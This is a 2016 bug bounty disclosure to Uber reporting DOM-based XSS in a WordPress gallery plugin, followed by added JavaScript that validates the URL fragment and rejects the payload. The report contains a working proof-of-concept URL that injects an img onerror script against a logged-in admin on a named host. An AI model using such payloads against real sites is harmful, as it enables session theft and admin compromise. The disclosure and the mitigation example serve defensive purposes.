DOM based XSS on

Disclosed: 2016-05-26 00:19:31 By blackzero To uber
Unknown
Vulnerability Details
Possible Remote code execution

DOM based XSS Vuln

Jquery param : var strliID=jQuery(location).attr('hash');

Target: Logged admin

Go url >> https://drive.uber.com/melbourne/wp-admin/admin.php?page=Options_gallery_styles#"><img src=M onerror=alert('0wn3d');>

Solution : Upgrade latest version gallery plugin (Your version v1.9.55)

Test my localhost picture attached:

Regards..
Report Stats
  • Report ID: 139875
  • State: Closed
  • Substate: informative
  • Upvotes: 1
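
The report shows the source (`jQuery(location).attr('hash')`) but not where `strliID` ends up. Assuming it reaches a selector or HTML-building call, the following added example (not code from the plugin or the report) reduces the fragment to a strict element id before any DOM lookup. `ID_PATTERN`, `fragmentToId`, `activateFromHash` and `makeFakeDocument` are hypothetical names, and the fake document is constructed so the code runs under Node.

```javascript
// Added example: hypothetical helper names; the plugin's real code is not on the page.

// Allowlist for an element id: a letter, then letters, digits, '_' or '-'.
const ID_PATTERN = /^[A-Za-z][A-Za-z0-9_-]{0,63}$/;

// Reduce a location.hash value to a plain element id, or null if it is anything else.
function fragmentToId(hash) {
  if (typeof hash !== 'string') return null;
  let raw = hash.startsWith('#') ? hash.slice(1) : hash;
  try {
    // The fragment may arrive percent-encoded; validate the decoded form.
    raw = decodeURIComponent(raw);
  } catch (err) {
    return null; // malformed escape sequence
  }
  return ID_PATTERN.test(raw) ? raw : null;
}

// Mark the element named by the fragment as active.
// `doc` is a Document (or a stand-in exposing getElementById, as in the demo).
function activateFromHash(doc, hash) {
  const id = fragmentToId(hash);
  if (id === null) return false;
  // getElementById treats its argument purely as a name,
  // so fragment content is never interpreted as markup.
  const el = doc.getElementById(id);
  if (!el) return false;
  el.classList.add('active');
  return true;
}

// Constructed stand-in for a page with a single tab element.
function makeFakeDocument() {
  const classes = [];
  const tab = { classList: { add: (c) => classes.push(c) } };
  return { classes, getElementById: (id) => (id === 'tab-2' ? tab : null) };
}

const demoDoc = makeFakeDocument();
// A well-formed fragment is accepted.
console.log(activateFromHash(demoDoc, '#tab-2'));
// The fragment from the report's URL is rejected before reaching the DOM.
console.log(activateFromHash(demoDoc, '#"><img src=M onerror=alert(\'0wn3d\');>'));
```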